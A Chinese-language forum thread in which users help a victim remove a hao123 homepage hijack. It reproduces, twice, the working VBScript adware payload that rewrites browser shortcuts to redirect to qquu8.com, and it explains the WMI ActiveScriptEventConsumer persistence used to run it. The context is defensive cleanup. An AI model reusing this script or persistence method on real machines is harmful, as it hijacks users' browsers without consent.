hao123綁架首頁,無法以powershell刪除vbscript腳本求助

ntconjohn

各位前輩好, 要麻煩您們抽空指導一下, 小弟pc是 win7 32位元 sp1企業版, ie,火狐, chrome被 hao123綁架首頁
已有段時間, 從網路找了些方法,刪除捷徑,機碼等都已無效,初步大概原因知道, pc 已被甚麼vbscript一直在修改首頁,
所以,刪除捷徑重開機又被綁,
無憂有篇回復文章,似乎跟小弟狀況一樣,由explore111大大撰寫,大概是寫的較詳細些 link:http://bbs.wuyou.net/forum.php?mod=viewthread&tid=378398&extra=&page=1
小弟將這篇copy如下,以~~~~~~~~~~~區隔開
`````````````````````````````````````````````````````````````````````````````````````````````````````````````

装了Win10, 要激活, 于是网上下载了一个所谓的小马KMS10激活
没想到中招了, 结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 添加的二个计划任务也删除了
可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.  网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.  重装系统, 这不符合我的风格呀(其实是软件太多,重装太麻烦)


于是装了一个HIPS, 发现原来是


scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门

(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了

下面大家看看小马的脚本
[vb] view plain copy file:///C:UsersntAppDataLocalTempmsohtmlclip11clip_image002.pngfile:///C:UsersntAppDataLocalTempmsohtmlclip11clip_image003.png

• On Error Resume     Next  
• Const link =     "http://hao.qquu8.com/?v=108&m=yx"  
• Const link360 =     "http://hao.qquu8.com/?v=108&m=yx&s=3"  
• browsers =     "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"  
• lnkpaths =     "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart     MenuPrograms,C:UsersshomeDesktop,C:UsersshomeAppDataRoamingMicrosoftInternet     ExplorerQuick Launch,C:UsersshomeAppDataRoamingMicrosoftInternet     ExplorerQuick LaunchUser     PinnedStartMenu,C:UsersshomeAppDataRoamingMicrosoftInternet     ExplorerQuick LaunchUser PinnedTaskBar,C:UsersshomeAppDataRoamingMicrosoftWindowsStart     MenuPrograms"  
• browsersArr =     Split(browsers,",")  
• Set oDic =     CreateObject("scripting.dictionary")  
• For Each browser In     browsersArr  
•     oDic.Add     LCase(browser), browser  
• Next  
• lnkpathsArr =     Split(lnkpaths,",")  
• Set oFolders =     CreateObject("scripting.dictionary")  
• For Each lnkpath In     lnkpathsArr  
•     oFolders.Add     lnkpath, lnkpath  
• Next  
• Set fso =     CreateObject("Scripting.Filesystemobject")  
• Set WshShell =     CreateObject("Wscript.Shell")  
• For Each oFolder In     oFolders  
•     If     fso.FolderExists(oFolder) Then  
•             For Each file In     fso.GetFolder(oFolder).Files  
•                 If LCase(fso.GetExtensionName(file.Path))     = "lnk" Then  
•                     Set oShellLink =     WshShell.CreateShortcut(file.Path)  
•                     path = oShellLink.TargetPath  
•                     name = fso.GetBaseName(path)     & "." & fso.GetExtensionName(path)  
•                     If oDic.Exists(LCase(name))     Then  
•                         If     LCase(name) = LCase("360se.exe") Then  
•                                 oShellLink.Arguments = link360  
•                             Else  
•                                 oShellLink.Arguments = link  
•                         End     If  
•                         If     file.Attributes And 1 Then  
•                                 file.Attributes = file.Attributes - 1  
•                         End     If  
•                             oShellLink.Save  
•                     End If  
•                 End If  
•             Next  
•     End     If  
• Next  
  

删除方法如下:以管理员身份运行PowerShell
执行以下命令

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding-Filter "Filter =""__eventfilter.name='VBScriptKids_filter'""" |Remove-WmiObject
gwmi -Namespace"root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name ='VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace"root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID= 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace"root/cimv2" -Class __EventFilter -Filter "Name ='VBScriptKids_filter'" | Remove-WmiObject

````````````````````````````````````````````````````````````````````````````````````````````````````````````````
小弟以WIMExplorer 真的找到了ActiveScriptEventConsumer 里面果然有一个vbs脚本,如下圖

內容是:
ScriptText: On Error Resume Next:Const link = "http://hao.qquu8.com/?m=yx&r=j3":Const link360 = "http://hao.qquu8.com/?m=yx&r=j3&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UsersntDesktop,C:UsersntAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UsersntAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UsersntAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UsersntAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

接著照無憂這篇文章以POWERSHELL去刪除腳本時,卻無法執行,
如下圖

  
偶去pc搜尋gwmi 也沒找到這程式,
如下圖

到這裡就做不下去
想請問各位前輩是否小弟上述步驟錯誤,或有沒有其他甚麼方法可以取代
POWERSHELL去刪除這個綁架首頁滴腳本? 麻煩大家囉,感激不盡!!

HiPP

PowerShell 我不熟，不過 gwmi 是 PowerShell 內部命令，
所以你必須先執行 PowerShell 命令後，才能執行 gwmi 命令。
或是前面加上 PowerShell gwmi 也行。

( 最好使用系統管理員權限去執行 PowerShell )

maguro.tw

Win7時代曾經被hao123 綁架首頁過,, 當時也搞了很久(刪除或做捷徑等)

幾乎都無效,,,最後毅然用Ghost將系統備份回來來解決

還好自己有養成幾乎每個禮拜備份一次系統的習慣

想要避免就是對岸的東西少碰...會比較安全

ntconjohn

HiPP 發表於 2016-11-5 15:12
PowerShell 我不熟，不過 gwmi 是 PowerShell 內部命令，
所以你必須先執行 PowerShell 命令後，才能執行 g ...

謝謝前輩指導
程式小弟是門外漢, 依照您說滴,先執行powershell,再跑那些指令,結果還是不行(如下),
``````````````````````````````````````````````````````````````````````````````````````````````````````````
Microsoft Windows [版本 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\System32

C:\Windows\System32>cd\

C:\>powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\> gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding-Filter "Fi
lter =""__eventfilter.name='VBScriptKids_filter'""" |Remove-WmiObject
Get-WmiObject : Invalid query
位於 行:1 字元:5
+ gwmi <<<<  -Namespace "root/cimv2" -Class __FilterToConsumerBinding-Filter "F
ilter =""__eventfilter.name='VBScriptKids_filter'""" |Remove-WmiObject
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], Managemen
   tException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.C
   ommands.GetWmiObjectCommand

PS C:\> gwmi -Namespace"root/cimv2" -Class ActiveScriptEventConsumer -Filter "Na
me ='VBScriptKids_consumer'" | Remove-WmiObject
Get-WmiObject : 找不到符合參數名稱 'Namespace"root/cimv2"' 的參數。
位於 行:1 字元:28
+ gwmi -Namespace"root/cimv2" <<<<  -Class ActiveScriptEventConsumer -Filter "N
ame ='VBScriptKids_consumer'" | Remove-WmiObject
    + CategoryInfo          : InvalidArgument: (:) [Get-WmiObject], ParameterB
   indingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
   ands.GetWmiObjectCommand

PS C:\> gwmi -Namespace"root/cimv2" -Class __IntervalTimerInstruction -Filter "T
imerID= 'VBScriptKids_timer'" | Remove-WmiObject
Get-WmiObject : 找不到符合參數名稱 'Namespace"root/cimv2"' 的參數。
位於 行:1 字元:28
+ gwmi -Namespace"root/cimv2" <<<<  -Class __IntervalTimerInstruction -Filter "
TimerID= 'VBScriptKids_timer'" | Remove-WmiObject
    + CategoryInfo          : InvalidArgument: (:) [Get-WmiObject], ParameterB
   indingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
   ands.GetWmiObjectCommand

PS C:\> gwmi -Namespace"root/cimv2" -Class __EventFilter -Filter "Name ='VBScrip
tKids_filter'" | Remove-WmiObject
Get-WmiObject : 找不到符合參數名稱 'Namespace"root/cimv2"' 的參數。
位於 行:1 字元:28
+ gwmi -Namespace"root/cimv2" <<<<  -Class __EventFilter -Filter "Name ='VBScri
ptKids_filter'" | Remove-WmiObject
    + CategoryInfo          : InvalidArgument: (:) [Get-WmiObject], ParameterB
   indingException
    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
   ands.GetWmiObjectCommand

PS C:\>
``````````````````````````````````````````````````````````````````````````````````````````````
偶發覺第一道指令,其中
Namespace"root/cimv2"中間沒空格, 其他三道指令則有空格....實在是看不懂,期待有熟悉powershell滴專家來解惑, 不然如樓上大大講重灌,工程可不小
指令執行截圖如下

maguro.tw

maguro.tw 發表於 2016-11-5 15:56
Win7時代曾經被hao123 綁架首頁過,, 當時也搞了很久(刪除或做捷徑等)

幾乎都無效,,,最後毅然用Ghost將系統 ...

不是增量備份

是完整的Ghost系統備份

大概每次就是10分鐘左右

反正硬碟容量大,,,都會留下3~4次的系統備份檔當安全保障

ali88home

這個綁架首頁從註冊表機碼設定就可以恢復了，多年前安裝軟件裡也曾經搞過，沒意義？跟中毒不一樣，在網路搜尋一下吧！我找看看以前的刪除方式...

如不相信，您可以再拿一個有綁架首頁的軟件安裝，一定變成新的首頁，這些無影響操作，只不過要您去刷首頁賺次數廣告吧!

http://www.uqidong.com/wtjd/2367.html
這方法最可靠，試試. 最後一步是刪除電腦IE的homepage的殺手鐧，哈哈...是清空首頁設定啦!記得最後IE 選項也要重新首頁設定.

ntconjohn

可人兒 發表於 2016-11-6 02:31
試試這個 也許幫到你:請到下列網址http://www.pkstep.com/archives/4038 下
載
   AdwCleaner 有軟體教學. ...

感謝前輩指導
用這套scan,掃完一次重開機還被綁, 偶再將 所有browser捷徑多餘字串, 包括 roaming,
重新再掃一次剩10個, clean完重開機, 完全正常, 真是好工具,(ps,第一次掃描之前應該要先將
所有browser捷徑多餘字串, 包括 roaming刪除,降應該就不用scan第二次)

ntconjohn

maguro.tw 發表於 2016-11-5 21:35
不是增量備份

是完整的Ghost系統備份

請問您ghost完整系統備份能簡單描述一下硬軟體條件嗎,小弟印象ghost都好久,
ex1. 作業系統
    2. 硬碟規格, sata或ssd, 還有磁區分割狀態
    3. 目前系統區使用容量大小
    4.ghost是何種版本? 11.5或11.0.2?
    5.ghost是已經安裝在本機,就是開機選單就有, 還是用winpe完成?(若沒用pe請跳至8.)
    6. 若是用pe那是用pe下純dos下滴ghost還是用 pe內ghost?
    7.pe是哪套(xpe或win7pe,win8pe,win10pe)?  32或64位元pe?,何處取得(論壇或作者)?
    8.ghost備份是否壓縮?
簡單提問, 請前輩抽空說明,感謝您!

maguro.tw

以前是Win7系統大約25G(備份前都會先清垃圾)

現在Win10系統大約23G(備份前都會先清垃圾)

C碟是SSD  都備份到D碟  3T

Ghost我習慣用DOS版的11.0.2   但也可利用PE於視窗版Ghost11.02  X32或X64均可...習慣用Win8PE

都是單執行檔(沒有安裝,可直接放於根目錄或隨身碟或FAT32的資料分區)....習慣用高壓縮省空間（高壓縮大約2000MB/min）,,但不壓縮備份速度最快

論壇內收尋一下應該可以找到WinPE 檔案可下載..Noname論壇也可下載

當然用Acronis True Image 2017  超快..（不壓縮～開始備份算起大約2分鐘完成）.備份更節省不少時間

https://www.microduo.tw/thread-32320-1-1.html

ego99we

hao123  《〈 很有名的  惡意 網站

firewall 裡都直接 拒絕 該 網址

強國人的想法  真的不是  我們能理解的....

原來 hao123 也一直在進步 ...   真是 道高一尺 魔高一丈

看了以上的回覆 ..    好像就是  定時備份  才能  以防萬一！！！